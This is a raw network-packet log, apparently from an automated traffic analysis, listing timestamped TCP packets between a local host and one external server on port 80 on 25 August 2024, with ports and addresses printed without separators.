                                    Aug 25, 2024 15:44:10.382642984 CEST4977180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:10.387710094 CEST804977180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:10.732539892 CEST4977180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:10.737683058 CEST804977180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:10.737696886 CEST804977180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:10.737709045 CEST804977180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:11.059572935 CEST804977180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:11.107254982 CEST4977180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:11.193948984 CEST804977180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:11.247905016 CEST4977180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:11.309375048 CEST4977180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:11.309675932 CEST4977280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:11.314611912 CEST804977280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:11.314691067 CEST4977280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:11.314738035 CEST804977180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:11.314769030 CEST4977280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:11.314785957 CEST4977180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:11.319592953 CEST804977280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:11.669878006 CEST4977280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:11.674850941 CEST804977280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:11.674937963 CEST804977280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:11.675057888 CEST804977280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:11.979078054 CEST804977280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:12.029131889 CEST4977280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:12.046087980 CEST4977380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:12.046389103 CEST4977280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:12.051130056 CEST804977380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:12.051211119 CEST4977380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:12.051295996 CEST4977380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:12.051702023 CEST804977280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:12.051749945 CEST4977280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:12.056175947 CEST804977380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:12.197891951 CEST4977480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:12.202900887 CEST804977480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:12.202990055 CEST4977480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:12.203104019 CEST4977480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:12.208002090 CEST804977480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:12.404232025 CEST4977380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:12.409337044 CEST804977380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:12.409420967 CEST804977380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:12.563148022 CEST4977480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:12.568243027 CEST804977480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:12.568490028 CEST804977480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:12.568527937 CEST804977480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:12.745075941 CEST804977380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:12.794750929 CEST4977380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:12.864228964 CEST804977480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:12.883660078 CEST804977380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:12.919783115 CEST4977480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:12.935353041 CEST4977380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:12.997497082 CEST804977480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:13.044728041 CEST4977480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:13.118738890 CEST4977380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:13.119477987 CEST4977480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:13.119477987 CEST4977680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:13.127434015 CEST804977680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:13.127521992 CEST4977680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:13.127667904 CEST4977680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:13.132972002 CEST804977680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:13.132992983 CEST804977380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:13.133039951 CEST4977380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:13.133043051 CEST804977480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:13.133084059 CEST4977480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:13.486105919 CEST4977680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:13.493190050 CEST804977680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:13.493204117 CEST804977680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:13.493216038 CEST804977680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:13.794229031 CEST804977680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:13.841599941 CEST4977680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:13.949173927 CEST804977680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:13.997911930 CEST4977680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:14.072999954 CEST4977780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:14.077924967 CEST804977780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:14.078020096 CEST4977780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:14.078092098 CEST4977780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:14.085987091 CEST804977780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:14.435457945 CEST4977780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:14.440829039 CEST804977780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:14.440843105 CEST804977780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:14.440853119 CEST804977780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:14.814344883 CEST804977780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:14.857263088 CEST4977780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:14.943761110 CEST804977780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:14.997855902 CEST4977780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:15.070822954 CEST4977680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:15.072892904 CEST4977780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:15.073592901 CEST4977880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:15.078358889 CEST804977780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:15.079788923 CEST804977880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:15.079839945 CEST4977780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:15.079868078 CEST4977880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:15.080034971 CEST4977880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:15.085133076 CEST804977880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:15.435611010 CEST4977880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:15.441812992 CEST804977880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:15.441828966 CEST804977880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:15.441838026 CEST804977880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:15.750068903 CEST804977880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:15.794753075 CEST4977880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:15.882800102 CEST804977880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:15.935388088 CEST4977880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:16.627856016 CEST4977880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:16.628156900 CEST4977980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:16.633070946 CEST804977980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:16.633160114 CEST4977980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:16.633265972 CEST4977980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:16.634635925 CEST804977880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:16.634702921 CEST4977880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:16.638120890 CEST804977980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:16.982475042 CEST4977980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:16.987509966 CEST804977980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:16.987524033 CEST804977980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:16.987533092 CEST804977980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:17.338368893 CEST804977980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:17.388514996 CEST4977980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:17.471532106 CEST804977980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:17.513484955 CEST4977980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:17.589612961 CEST4977980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:17.590214968 CEST4978080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:17.595432997 CEST804977980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:17.595494986 CEST4977980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:17.596250057 CEST804978080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:17.596316099 CEST4978080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:17.596431017 CEST4978080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:17.602884054 CEST804978080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:17.890275955 CEST4978180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:17.890434980 CEST4978080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:17.895226002 CEST804978180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:17.895315886 CEST4978180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:17.895472050 CEST4978180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:17.900283098 CEST804978180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:17.939192057 CEST804978080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:18.010278940 CEST4978280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:18.015480995 CEST804978280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:18.015574932 CEST4978280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:18.015693903 CEST4978280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:18.020716906 CEST804978280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:18.081368923 CEST804978080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:18.081500053 CEST4978080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:18.247993946 CEST4978180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:18.254511118 CEST804978180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:18.254931927 CEST804978180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:18.373075962 CEST4978280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:18.378029108 CEST804978280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:18.378040075 CEST804978280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:18.378048897 CEST804978280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:18.577860117 CEST804978180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:18.622875929 CEST4978180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:18.687629938 CEST804978280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:18.732248068 CEST4978280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:18.782084942 CEST804978180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:18.825988054 CEST4978180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:18.889750004 CEST804978280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:18.935365915 CEST4978280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:19.073766947 CEST4978180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:19.073853016 CEST4978280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:19.075436115 CEST4978380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:19.076967001 CEST4977080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:19.077065945 CEST4974080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:19.078957081 CEST804978180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:19.079022884 CEST4978180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:19.080960989 CEST804978380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:19.081026077 CEST4978380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:19.081146955 CEST4978380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:19.081408978 CEST804978280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:19.081454992 CEST4978280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:19.086191893 CEST804978380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:19.435446978 CEST4978380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:19.440448046 CEST804978380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:19.440463066 CEST804978380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:19.440479040 CEST804978380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:19.772803068 CEST804978380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:19.826229095 CEST4978380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:19.976860046 CEST804978380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:20.029155016 CEST4978380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:20.103635073 CEST4978380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:20.104311943 CEST4978480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:20.111947060 CEST804978380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:20.112032890 CEST4978380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:20.112910032 CEST804978480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:20.113001108 CEST4978480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:20.113158941 CEST4978480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:20.118096113 CEST804978480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:20.466770887 CEST4978480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:20.471873045 CEST804978480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:20.471978903 CEST804978480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:20.472213030 CEST804978480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:20.789216995 CEST804978480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:20.841654062 CEST4978480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:20.918942928 CEST804978480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:20.919282913 CEST4978480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:20.924499989 CEST804978480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:20.924587965 CEST4978480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:21.041745901 CEST4978580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:21.046968937 CEST804978580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:21.047046900 CEST4978580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:21.047178984 CEST4978580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:21.052519083 CEST804978580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:21.422295094 CEST4978580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:21.427333117 CEST804978580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:21.427350044 CEST804978580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:21.427360058 CEST804978580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:21.716005087 CEST804978580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:21.763631105 CEST4978580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:21.921788931 CEST804978580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:21.966682911 CEST4978580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:22.041491985 CEST4978580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:22.042131901 CEST4978780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:22.047075987 CEST804978580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:22.047156096 CEST4978580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:22.047190905 CEST804978780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:22.047261953 CEST4978780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:22.047396898 CEST4978780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:22.052170992 CEST804978780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:22.404309034 CEST4978780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:22.409591913 CEST804978780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:22.409656048 CEST804978780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:22.409701109 CEST804978780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:22.712323904 CEST804978780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:41.497098923 CEST4980980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:41.502423048 CEST804980980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:41.502522945 CEST4980980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:41.529144049 CEST4981080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:41.617657900 CEST4980680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:41.620826006 CEST4981080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:41.621606112 CEST4981180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:41.626166105 CEST804981080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:41.626296997 CEST4981080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:41.626665115 CEST804981180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:41.626743078 CEST4981180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:41.626873016 CEST4981180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:41.631639957 CEST804981180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:41.996226072 CEST4981180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:42.001291990 CEST804981180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:42.001338005 CEST804981180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:42.001348972 CEST804981180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:42.298043966 CEST804981180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:42.341658115 CEST4981180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:42.505667925 CEST804981180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:42.560412884 CEST4981180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:42.623912096 CEST4981380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:42.629817963 CEST804981380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:42.629900932 CEST4981380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:42.630007982 CEST4981380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:42.634783983 CEST804981380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:42.982507944 CEST4981380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:42.987514019 CEST804981380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:42.987549067 CEST804981380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:42.987560034 CEST804981380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:43.301285028 CEST804981380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:43.357261896 CEST4981380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:43.435637951 CEST804981380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:43.482299089 CEST4981380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:43.557070017 CEST4981380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:43.557727098 CEST4981480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:43.562287092 CEST804981380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:43.562673092 CEST804981480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:43.562789917 CEST4981380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:43.562789917 CEST4981480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:43.562948942 CEST4981480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:43.567768097 CEST804981480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:43.919903040 CEST4981480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:43.925013065 CEST804981480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:43.925029039 CEST804981480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:43.925038099 CEST804981480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:44.248076916 CEST804981480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:44.294847012 CEST4981480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:44.461978912 CEST804981480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:44.513534069 CEST4981480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:44.645565987 CEST4981480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:44.646009922 CEST4981580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:44.651282072 CEST804981480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:44.651300907 CEST804981580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:44.651390076 CEST4981480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:44.651448011 CEST4981580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:44.655134916 CEST4981580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:44.662692070 CEST804981580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:45.013719082 CEST4981580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:45.019999027 CEST804981580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:45.020078897 CEST804981580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:45.020090103 CEST804981580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:45.339394093 CEST804981580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:45.388607979 CEST4981580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:45.466134071 CEST804981580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:45.513605118 CEST4981580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:45.584501028 CEST4981180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:45.589343071 CEST4981580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:45.589994907 CEST4981680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:45.594537020 CEST804981580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:45.594736099 CEST4981580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:45.596020937 CEST804981680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:45.596105099 CEST4981680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:45.596263885 CEST4981680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:45.602369070 CEST804981680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:45.951143026 CEST4981680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:45.957154036 CEST804981680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:45.957173109 CEST804981680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:45.957182884 CEST804981680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:46.268445969 CEST804981680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:46.310411930 CEST4981680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:46.472846031 CEST804981680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:46.513567924 CEST4981680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:46.545533895 CEST4981680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:46.546442032 CEST4981780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:46.551074028 CEST804981680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:46.551156044 CEST4981680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:46.551338911 CEST804981780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:46.551435947 CEST4981780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:46.551513910 CEST4981780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:46.556288004 CEST804981780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:46.588419914 CEST4981780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:46.588855982 CEST4981880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:46.593655109 CEST804981880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:46.593738079 CEST4981880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:46.593861103 CEST4981880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:46.598617077 CEST804981880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:46.639098883 CEST804981780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:46.951167107 CEST4981880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:46.956078053 CEST804981880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:46.956147909 CEST804981880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:46.956197977 CEST804981880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:47.017774105 CEST804981780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:47.017838001 CEST4981780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:47.261003017 CEST804981880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:47.313158035 CEST4981880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:47.459873915 CEST804981880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:47.513570070 CEST4981880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:47.681714058 CEST4981880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:47.683128119 CEST4981980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:47.686918974 CEST804981880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:47.686970949 CEST4981880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:47.687988043 CEST804981980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:47.688057899 CEST4981980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:47.688256025 CEST4981980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:47.693038940 CEST804981980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:48.044972897 CEST4981980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:48.050785065 CEST804981980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:48.050798893 CEST804981980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:48.050807953 CEST804981980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:48.381426096 CEST804981980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:48.435432911 CEST4981980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:48.515692949 CEST804981980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:48.560478926 CEST4981980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:48.668858051 CEST4981980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:48.669600010 CEST4982080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:48.674187899 CEST804981980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:48.674500942 CEST804982080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:48.674700022 CEST4981980192.168.2.680.211.144.156
